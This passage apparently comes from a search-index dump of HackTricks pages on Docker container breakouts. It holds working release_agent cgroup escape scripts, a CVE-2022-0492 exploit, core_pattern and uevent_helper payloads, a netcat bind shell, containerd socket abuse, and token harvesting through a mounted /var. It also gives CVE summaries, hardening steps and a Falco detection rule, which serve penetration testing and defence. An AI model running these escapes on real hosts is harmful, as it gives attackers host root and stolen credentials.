\\\\$0)/${OUTPUT_NAME} # Commands to run on the host<\\nps -eaf > \\\\${OUTPATH} 2>&1\\n__EOF__ # Make the payload script executable\\nchmod a+x ${PAYLOAD_PATH} # Set up the cgroup mount using the memory resource cgroup controller\\nmkdir ${CGROUP_MOUNT}\\nmount -t cgroup -o memory cgroup ${CGROUP_MOUNT}\\nmkdir ${CGROUP_MOUNT}/${CGROUP_NAME}\\necho 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release # Brute force the host pid until the output path is created, or we run out of guesses\\nTPID=1\\nwhile [ ! -f ${OUTPUT_PATH} ]\\ndo\\nif [ $((${TPID} % 100)) -eq 0 ]\\nthen\\necho \\"Checking pid ${TPID}\\"\\nif [ ${TPID} -gt ${MAX_PID} ]\\nthen\\necho \\"Exiting at ${MAX_PID} :-(\\"\\nexit 1\\nfi\\nfi\\n# Set the release_agent path to the guessed pid\\necho \\"/proc/${TPID}/root${PAYLOAD_PATH}\\" > ${CGROUP_MOUNT}/release_agent\\n# Trigger execution of the release_agent\\nsh -c \\"echo \\\\$\\\\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs\\"\\nTPID=$((${TPID} + 1))\\ndone # Wait for and cat the output\\nsleep 1\\necho \\"Done! Output:\\"\\ncat ${OUTPUT_PATH} tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » release_agent exploit - Relative Paths to PIDs » 利用过程","id":"1645","title":"利用过程"},"1646":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 有关更多详细信息,请参阅 原始博客文章 。 这只是一个摘要:","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » Docker release_agent cgroups escape","id":"1646","title":"Docker release_agent cgroups escape"},"1647":{"body":"shell d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`\\nmkdir -p $d/w;echo 1 >$d/w/notify_on_release\\nt=`sed -n \'s/.*\\\\perdir=\\\\([^,]*\\\\).*/\\\\1/p\' /etc/mtab`\\ntouch /o; echo $t/c >$d/release_agent;echo \\"#!/bin/sh\\n$1 >$t/o\\" >/c;chmod +x /c;sh -c \\"echo 0 >$d/w/cgroup.procs\\";sleep 1;cat /o PoC 利用 cgroup-v1 的 release_agent 特性:当一个 cgroup 的最后一个任务退出时,如果该 cgroup 设置了 notify_on_release=1,内核(在 主机的初始命名空间中 )会执行存储在可写文件 release_agent 中的程序路径。由于该执行是在 主机上具有完全的 root 权限 ,因此获得对该文件的写入访问权限就足以实现容器逃逸。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 经典 PoC (2019)","id":"1647","title":"经典 PoC (2019)"},"1648":{"body":"准备一个新的 cgroup shell mkdir /tmp/cgrp\\nmount -t cgroup -o rdma cgroup /tmp/cgrp # 或 –o memory\\nmkdir /tmp/cgrp/x\\necho 1 > /tmp/cgrp/x/notify_on_release 将 release_agent 指向主机上攻击者控制的脚本 shell host_path=$(sed -n \'s/.*\\\\perdir=\\\\([^,]*\\\\).*/\\\\1/p\' /etc/mtab)\\necho \\"$host_path/cmd\\" > /tmp/cgrp/release_agent 投放有效载荷 shell cat <<\'EOF\' > /cmd\\n#!/bin/sh\\nps aux > \\"$host_path/output\\"\\nEOF\\nchmod +x /cmd 触发通知器 shell sh -c \\"echo $$ > /tmp/cgrp/x/cgroup.procs\\" # 添加自己并立即退出\\ncat /output # 现在包含主机进程","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 简短、易读的操作步骤","id":"1648","title":"简短、易读的操作步骤"},"1649":{"body":"在 2022 年 2 月,Yiqi Sun 和 Kevin Wang 发现 内核在进程写入 cgroup-v1 中的 release_agent 时并未验证能力 (函数 cgroup_release_agent_write)。 实际上 任何能够挂载 cgroup 层次结构的进程(例如通过 unshare -UrC)都可以在 初始 用户命名空间中写入任意路径到 release_agent,而无需 CAP_SYS_ADMIN 。在默认配置、以 root 运行的 Docker/Kubernetes 容器中,这允许: 提升到主机上的 root 权限;↗ 在容器未被提升的情况下实现容器逃逸。 该缺陷被分配为 CVE-2022-0492 (CVSS 7.8 / 高)并在以下内核版本中修复(以及所有后续版本): 5.16.2, 5.15.17, 5.10.93, 5.4.176, 4.19.228, 4.14.265, 4.9.299。 补丁提交:1e85af15da28 \\"cgroup: Fix permission checking\\"。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 2022 内核漏洞 – CVE-2022-0492","id":"1649","title":"2022 内核漏洞 – CVE-2022-0492"},"165":{"body":"","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » FHRP Hijacking Overview","id":"165","title":"FHRP Hijacking Overview"},"1650":{"body":"bash # prerequisites: container is run as root, no seccomp/AppArmor profile, cgroup-v1 rw inside\\napk add --no-cache util-linux # provides unshare\\nunshare -UrCm sh -c \'\\nmkdir /tmp/c; mount -t cgroup -o memory none /tmp/c;\\necho 1 > /tmp/c/notify_on_release;\\necho /proc/self/exe > /tmp/c/release_agent; # will exec /bin/busybox from host\\n(sleep 1; echo 0 > /tmp/c/cgroup.procs) &\\nwhile true; do sleep 1; done\\n\' 如果内核存在漏洞,来自 host 的 busybox 二进制文件将以完全 root 权限执行。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 容器内的最小利用代码","id":"1650","title":"容器内的最小利用代码"},"1651":{"body":"更新内核 (≥ 版本以上)。该补丁现在要求在 initial 用户命名空间中具有 CAP_SYS_ADMIN 才能写入 release_agent。 优先使用 cgroup-v2 – 统一层次 完全移除了 release_agent 功能 ,消除了这一类的逃逸。 禁用不需要的非特权用户命名空间 : shell sysctl -w kernel.unprivileged_userns_clone=0 强制访问控制 :AppArmor/SELinux 策略拒绝在 /sys/fs/cgroup/**/release_agent 上执行 mount、openat,或丢弃 CAP_SYS_ADMIN,即使在易受攻击的内核上也能阻止该技术。 只读绑定掩码 所有 release_agent 文件(Palo Alto 脚本示例): shell for f in $(find /sys/fs/cgroup -name release_agent); do\\nmount --bind -o ro /dev/null \\"$f\\"\\ndone","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 加固与缓解措施","id":"1651","title":"加固与缓解措施"},"1652":{"body":"Falco 自 v0.32 起提供内置规则: yaml - rule: Detect release_agent File Container Escapes\\ndesc: Detect an attempt to exploit a container escape using release_agent\\ncondition: open_write and container and fd.name endswith release_agent and\\n(user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and\\nthread.cap_effective contains CAP_SYS_ADMIN\\noutput: \\"Potential release_agent container escape (file=%fd.name user=%user.name cap=%thread.cap_effective)\\"\\npriority: CRITICAL\\ntags: [container, privilege_escalation] 规则在容器内仍然拥有 CAP_SYS_ADMIN 的进程尝试写入 */release_agent 时触发。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 运行时检测","id":"1652","title":"运行时检测"},"1653":{"body":"Unit 42 – CVE-2022-0492: container escape via cgroups – 详细分析和缓解脚本。 Sysdig Falco rule & detection guide tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 参考","id":"1653","title":"参考"},"1654":{"body":"Reading time: 16 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 暴露 /proc、/sys 和 /var 而没有适当的命名空间隔离会引入重大安全风险,包括攻击面扩大和信息泄露。这些目录包含敏感文件,如果配置错误或被未经授权的用户访问,可能导致容器逃逸、主机修改,或提供有助于进一步攻击的信息。例如,错误地挂载 -v /proc:/host/proc 可能会由于其基于路径的特性绕过 AppArmor 保护,使得 /host/proc 处于未保护状态。 您可以在 https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts ** 中找到每个潜在漏洞的更多详细信息。**","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » 敏感挂载","id":"1654","title":"敏感挂载"},"1655":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » procfs 漏洞","id":"1655","title":"procfs 漏洞"},"1656":{"body":"该目录允许访问以修改内核变量,通常通过 sysctl(2),并包含几个值得关注的子目录: /proc/sys/kernel/core_pattern 在 core(5) 中描述。 如果您可以写入此文件,则可以写入一个管道 |,后跟将在崩溃发生后执行的程序或脚本的路径。 攻击者可以通过执行 mount 找到主机内的路径,并将路径写入其容器文件系统中的二进制文件。然后,崩溃一个程序以使内核在容器外执行该二进制文件。 测试和利用示例 : bash [ -w /proc/sys/kernel/core_pattern ] && echo Yes # Test write access\\ncd /proc/sys/kernel\\necho \\"|$overlay/shell.sh\\" > core_pattern # Set custom handler\\nsleep 5 && ./crash & # Trigger handler 检查 this post 以获取更多信息。 示例程序崩溃: c int main(void) {\\nchar buf[1];\\nfor (int i = 0; i < 100; i++) {\\nbuf[i] = 1;\\n}\\nreturn 0;\\n} /proc/sys/kernel/modprobe 在 proc(5) 中详细说明。 包含用于加载内核模块的内核模块加载器的路径。 检查访问示例 : bash ls -l $(cat /proc/sys/kernel/modprobe) # 检查对 modprobe 的访问 /proc/sys/vm/panic_on_oom 在 proc(5) 中引用。 一个全局标志,控制内核在发生 OOM 条件时是否崩溃或调用 OOM 杀手。 /proc/sys/fs 根据 proc(5) ,包含有关文件系统的选项和信息。 写入访问可以启用针对主机的各种拒绝服务攻击。 /proc/sys/fs/binfmt_misc 允许根据其魔术数字注册非本地二进制格式的解释器。 如果 /proc/sys/fs/binfmt_misc/register 可写,可能导致特权升级或 root shell 访问。 相关漏洞和解释: Poor man\'s rootkit via binfmt_misc 深入教程: 视频链接","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » /proc/sys","id":"1656","title":"/proc/sys"},"1657":{"body":"/proc/config.gz 如果启用了 CONFIG_IKCONFIG_PROC,可能会揭示内核配置。 对攻击者识别运行内核中的漏洞非常有用。 /proc/sysrq-trigger 允许调用 Sysrq 命令,可能导致立即重启系统或其他关键操作。 重启主机示例 : bash echo b > /proc/sysrq-trigger # 重启主机 /proc/kmsg 暴露内核环形缓冲区消息。 可以帮助内核漏洞利用、地址泄漏,并提供敏感系统信息。 /proc/kallsyms 列出内核导出符号及其地址。 对于内核漏洞开发至关重要,尤其是克服 KASLR。 地址信息在 kptr_restrict 设置为 1 或 2 时受到限制。 详细信息见 proc(5) 。 /proc/[pid]/mem 与内核内存设备 /dev/mem 交互。 历史上容易受到特权升级攻击。 更多信息见 proc(5) 。 /proc/kcore 以 ELF core 格式表示系统的物理内存。 读取可能泄漏主机系统和其他容器的内存内容。 大文件大小可能导致读取问题或软件崩溃。 详细用法见 Dumping /proc/kcore in 2019 。 /proc/kmem /dev/kmem 的替代接口,表示内核虚拟内存。 允许读取和写入,因此可以直接修改内核内存。 /proc/mem /dev/mem 的替代接口,表示物理内存。 允许读取和写入,修改所有内存需要解析虚拟地址到物理地址。 /proc/sched_debug 返回进程调度信息,绕过 PID 命名空间保护。 暴露进程名称、ID 和 cgroup 标识符。 /proc/[pid]/mountinfo 提供有关进程挂载命名空间中挂载点的信息。 暴露容器 rootfs 或映像的位置。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » 其他 /proc 中的内容","id":"1657","title":"其他 /proc 中的内容"},"1658":{"body":"/sys/kernel/uevent_helper 用于处理内核设备 uevents。 写入 /sys/kernel/uevent_helper 可以在 uevent 触发时执行任意脚本。 利用示例 : bash #### Creates a payload echo \\"#!/bin/sh\\" > /evil-helper echo \\"ps > /output\\" >> /evil-helper chmod +x /evil-helper #### Finds host path from OverlayFS mount for container host*path=$(sed -n \'s/.*\\\\perdir=(\\\\[^,]\\\\_).\\\\*/\\\\1/p\' /etc/mtab) #### Sets uevent_helper to malicious helper echo \\"$host_path/evil-helper\\" > /sys/kernel/uevent_helper #### Triggers a uevent echo change > /sys/class/mem/null/uevent #### Reads the output cat /output /sys/class/thermal Controls temperature settings, potentially causing DoS attacks or physical damage. /sys/kernel/vmcoreinfo Leaks kernel addresses, potentially compromising KASLR. /sys/kernel/security Houses securityfs interface, allowing configuration of Linux Security Modules like AppArmor. Access might enable a container to disable its MAC system. /sys/firmware/efi/vars and /sys/firmware/efi/efivars Exposes interfaces for interacting with EFI variables in NVRAM. Misconfiguration or exploitation can lead to bricked laptops or unbootable host machines. /sys/kernel/debug debugfs offers a \\"no rules\\" debugging interface to the kernel. History of security issues due to its unrestricted nature.","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » /sys 漏洞","id":"1658","title":"/sys 漏洞"},"1659":{"body":"The host\'s /var folder contains container runtime sockets and the containers\' filesystems. If this folder is mounted inside a container, that container will get read-write access to other containers\' file systems with root privileges. This can be abused to pivot between containers, to cause a denial of service, or to backdoor other containers and applications that run in them. Kubernetes If a container like this is deployed with Kubernetes: yaml apiVersion: v1 kind: Pod metadata: name: pod-mounts-var labels: app: pentest spec: containers: - name: pod-mounts-var-folder image: alpine volumeMounts: - mountPath: /host-var name: noderoot command: [ \\"/bin/sh\\", \\"-c\\", \\"--\\" ] args: [ \\"while true; do sleep 30; done;\\" ] volumes: - name: noderoot hostPath: path: /var Inside the pod-mounts-var-folder container: bash / # find /host-var/ -type f -iname \'*.env*\' 2>/dev/null /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/201/fs/usr/src/app/.env.example\\n\\n/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/135/fs/docker-entrypoint.d/15-local-resolvers.envsh / # cat /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/105/fs/usr/src/app/.env.example | grep -i secret\\nJWT_SECRET=85da0\\nREFRESH_TOKEN_SECRET=14ea / # find /host-var/ -type f -iname \'index.html\' 2>/dev/null\\n/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/57/fs/usr/src/app/node_modules/@mapbox/node-pre-gyp/lib/util/nw-pre-gyp/index.html\\n\\n/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/share/nginx/html/index.html\\n/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/132/fs/usr/share/nginx/html/index.html / # echo \'\' > /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/share/nginx/html/index2.html The XSS was achieved: Stored XSS via mounted /var folder Note that the container DOES NOT require a restart or anything. Any changes made via the mounted /var folder will be applied instantly. You can also replace configuration files, binaries, services, application files, and shell profiles to achieve automatic (or semi-automatic) RCE. Access to cloud credentials The container can read K8s serviceaccount tokens or AWS webidentity tokens which allows the container to gain unauthorized access to K8s or cloud: bash / # find /host-var/ -type f -iname \'*token*\' 2>/dev/null | grep kubernetes.io\\n/host-var/lib/kubelet/pods/21411f19-934c-489e-aa2c-4906f278431e/volumes/kubernetes.io~projected/kube-api-access-64jw2/..2025_01_22_12_37_42.4197672587/token\\n\\n/host-var/lib/kubelet/pods/01c671a5-aaeb-4e0b-adcd-1cacd2e418ac/volumes/kubernetes.io~projected/kube-api-access-bljdj/..2025_01_22_12_17_53.265458487/token\\n/host-var/lib/kubelet/pods/01c671a5-aaeb-4e0b-adcd-1cacd2e418ac/volumes/kubernetes.io~projected/aws-iam-token/..2025_01_22_03_45_56.2328221474/token\\n/host-var/lib/kubelet/pods/5fb6bd26-a6aa-40cc-abf7-ecbf18dde1f6/volumes/kubernetes.io~projected/kube-api-access-fm2t6/..2025_01_22_12_25_25.3018586444/token Docker The exploitation in Docker (or in Docker Compose deployments) is exactly the same, except that usually the other containers\' filesystems are available under a different base path: bash $ docker info | grep -i \'docker root\\\\|storage driver\'\\n存储驱动: overlay2\\nDocker 根目录: /var/lib/docker So the filesystems are under /var/lib/docker/overlay2/: bash $ sudo ls -la /var/lib/docker/overlay2 drwx--x--- 4 root root 4096 1月 9 22:14 00762bca8ea040b1bb28b61baed5704e013ab23a196f5fe4758dafb79dfafd5d\\ndrwx--x--- 4 root root 4096 1月 11 17:00 03cdf4db9a6cc9f187cca6e98cd877d581f16b62d073010571e752c305719496\\ndrwx--x--- 4 root root 4096 1月 9 21:23 049e02afb3f8dec80cb229719d9484aead269ae05afe81ee5880ccde2426ef4f\\ndrwx--x--- 4 root root 4096 1月 9 21:22 062f14e5adbedce75cea699828e22657c8044cd22b68ff1bb152f1a3c8a377f2\\n Note The actual paths may differ in different setups, which is why your best bet is to use the find command to locate the other containers\' filesystems and SA / web identity tokens","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » /var Vulnerabilities","id":"1659","title":"/var Vulnerabilities"},"166":{"body":"FHRP旨在通过将多个路由器合并为一个虚拟单元来提供网络的鲁棒性,从而增强负载分配和容错能力。思科系统公司在这一套协议中引入了GLBP和HSRP等重要协议。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » Insights into FHRP","id":"166","title":"Insights into FHRP"},"1660":{"body":"Mounting certain host Unix sockets or writable pseudo-filesystems is equivalent to giving the container full root on the node. Treat the following paths as highly sensitive and never expose them to untrusted workloads : text /run/containerd/containerd.sock # containerd CRI 套接字 /var/run/crio/crio.sock # CRI-O 运行时套接字 /run/podman/podman.sock # Podman API(有根或无根) /run/buildkit/buildkitd.sock # BuildKit 守护进程(有根) /var/run/kubelet.sock # Kubernetes 节点上的 Kubelet API /run/firecracker-containerd.sock # Kata / Firecracker Attack example abusing a mounted containerd socket: bash # 在容器内(套接字挂载在 /host/run/containerd.sock)\\nctr --address /host/run/containerd.sock images pull docker.io/library/busybox:latest\\nctr --address /host/run/containerd.sock run --tty --privileged --mount \\\\\\ntype=bind,src=/,dst=/host,options=rbind:rw docker.io/library/busybox:latest host /bin/sh\\nchroot /host /bin/bash # 在主机上获得完整的 root shell A similar technique works with crictl , podman or the kubelet API once their respective sockets are exposed. Writable cgroup v1 mounts are also dangerous. If /sys/fs/cgroup is bind-mounted rw and the host kernel is vulnerable to CVE-2022-0492 , an attacker can set a malicious release_agent and execute arbitrary code in the initial namespace: bash # 假设容器具有 CAP_SYS_ADMIN 权限并且内核存在漏洞\\nmkdir -p /tmp/x && echo 1 > /tmp/x/notify_on_release echo \'/tmp/pwn\' > /sys/fs/cgroup/release_agent # 需要 CVE-2022-0492 echo -e \'#!/bin/sh\\\\nnc -lp 4444 -e /bin/sh\' > /tmp/pwn && chmod +x /tmp/pwn\\nsh -c \\"echo 0 > /tmp/x/cgroup.procs\\" # 触发 empty-cgroup 事件 When the last process leaves the cgroup, /tmp/pwn runs as root on the host . Patched kernels (>5.8 with commit 32a0db39f30d) validate the writer’s capabilities and block this abuse.","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » Other Sensitive Host Sockets and Directories (2023-2025)","id":"1660","title":"Other Sensitive Host Sockets and Directories (2023-2025)"},"1661":{"body":"CVE-2024-21626 – runc “Leaky Vessels” file-descriptor leak runc ≤ 1.1.11 leaked an open directory file descriptor that could point to the host root. A malicious image or docker exec could start a container whose working directory is already on the host filesystem, enabling arbitrary file read/write and privilege escalation. Fixed in runc 1.1.12 (Docker ≥ 25.0.3, containerd ≥ 1.7.14). Dockerfile FROM scratch\\nWORKDIR /proc/self/fd/4 # 4 == \\"/\\" on the host leaked by the runtime\\nCMD [\\"/bin/sh\\"] CVE-2024-23651 / 23653 – BuildKit OverlayFS copy-up TOCTOU A race condition in the BuildKit snapshotter let an attacker replace a file that was about to be copy-up into the container’s rootfs with a symlink to an arbitrary path on the host, gaining write access outside the build context. Fixed in BuildKit v0.12.5 / Buildx 0.12.0. Exploitation requires an untrusted docker build on a vulnerable daemon. CVE-2024-1753 – Buildah / Podman bind-mount breakout during build Buildah ≤ 1.35.0 (and Podman ≤ 4.9.3) incorrectly resolved absolute paths passed to --mount=type=bind in a Containerfile . A crafted build stage could mount / from the host read-write inside the build container when SELinux was disabled or in permissive mode, leading to full escape at build time. Patched in Buildah 1.35.1 and the corresponding Podman 4.9.4 back-port series. CVE-2024-40635 – containerd UID integer overflow Supplying a User value larger than 2147483647 in an image config overflowed the 32-bit signed integer and started the process as UID 0 inside the host user namespace. Workloads expected to run as non-root could therefore obtain root privileges. Fixed in containerd 1.6.38 / 1.7.27 / 2.0.4.","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » Mount-Related Escape CVEs (2023-2025)","id":"1661","title":"Mount-Related Escape CVEs (2023-2025)"},"1662":{"body":"Bind-mount host paths read-only whenever possible and add nosuid,nodev,noexec mount options. Prefer dedicated side-car proxies or rootless clients instead of exposing the runtime socket directly. Keep the container runtime up-to-date (runc ≥ 1.1.12, BuildKit ≥ 0.12.5, Buildah ≥ 1.35.1 / Podman ≥ 4.9.4, containerd ≥ 1.7.27). In Kubernetes, use securityContext.readOnlyRootFilesystem: true, the restricted PodSecurity profile and avoid hostPath volumes pointing to the paths listed above.","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » Hardening Reminders (2025)","id":"1662","title":"Hardening Reminders (2025)"},"1663":{"body":"runc CVE-2024-21626 advisory Unit 42 analysis of CVE-2022-0492 https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts Understanding and Hardening Linux Containers Abusing Privileged and Unprivileged Linux Containers Buildah CVE-2024-1753 advisory containerd CVE-2024-40635 advisory tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » References","id":"1663","title":"References"},"1664":{"body":"Reading time: 2 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Namespaces","id":"1664","title":"Namespaces"},"1665":{"body":"PID Namespace","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID namespace","id":"1665","title":"PID namespace"},"1666":{"body":"Mount Namespace","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount namespace","id":"1666","title":"Mount namespace"},"1667":{"body":"Network Namespace","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network namespace","id":"1667","title":"Network namespace"},"1668":{"body":"IPC Namespace","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace","id":"1668","title":"IPC Namespace"},"1669":{"body":"UTS Namespace","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS namespace","id":"1669","title":"UTS namespace"},"167":{"body":"思科创建的GLBP在TCP/IP协议栈上运行,使用UDP在3222端口进行通信。GLBP组中的路由器每3秒交换一次“hello”数据包。如果路由器在10秒内未发送这些数据包,则被认为是离线的。然而,这些定时器并不是固定的,可以进行修改。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » GLBP Protocol Insights","id":"167","title":"GLBP Protocol Insights"},"1670":{"body":"Time Namespace","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace","id":"1670","title":"Time Namespace"},"1671":{"body":"User Namespace tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User namespace","id":"1671","title":"User namespace"},"1672":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » CGroup Namespace","id":"1672","title":"CGroup Namespace"},"1673":{"body":"cgroup 命名空间是一个 Linux 内核特性,提供 在命名空间内运行的进程的 cgroup 层次结构的隔离 。Cgroups,简称 控制组 ,是一个内核特性,允许将进程组织成层次组,以管理和强制 系统资源的限制 ,如 CPU、内存和 I/O。 虽然 cgroup 命名空间不是我们之前讨论的其他命名空间类型(PID、挂载、网络等),但它们与命名空间隔离的概念相关。 Cgroup 命名空间虚拟化了 cgroup 层次结构的视图 ,因此在 cgroup 命名空间内运行的进程与在主机或其他命名空间中运行的进程相比,具有不同的层次结构视图。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 基本信息","id":"1673","title":"基本信息"},"1674":{"body":"当创建一个新的 cgroup 命名空间时, 它以创建进程的 cgroup 为基础,开始查看 cgroup 层次结构 。这意味着在新的 cgroup 命名空间中运行的进程将只看到整个 cgroup 层次结构的一个子集,限制在以创建进程的 cgroup 为根的 cgroup 子树内。 在 cgroup 命名空间内的进程将 将自己的 cgroup 视为层次结构的根 。这意味着,从命名空间内进程的角度来看,它们自己的 cgroup 显示为根,并且它们无法看到或访问其自身子树之外的 cgroup。 Cgroup 命名空间并不直接提供资源的隔离; 它们仅提供 cgroup 层次结构视图的隔离 。 资源控制和隔离仍然由 cgroup 子系统(例如,cpu、内存等)本身强制执行。 有关 CGroups 的更多信息,请查看: CGroups","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 工作原理:","id":"1674","title":"工作原理:"},"1675":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 实验:","id":"1675","title":"实验:"},"1676":{"body":"CLI bash sudo unshare -C [--mount-proc] /bin/bash 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离的视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题解释 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 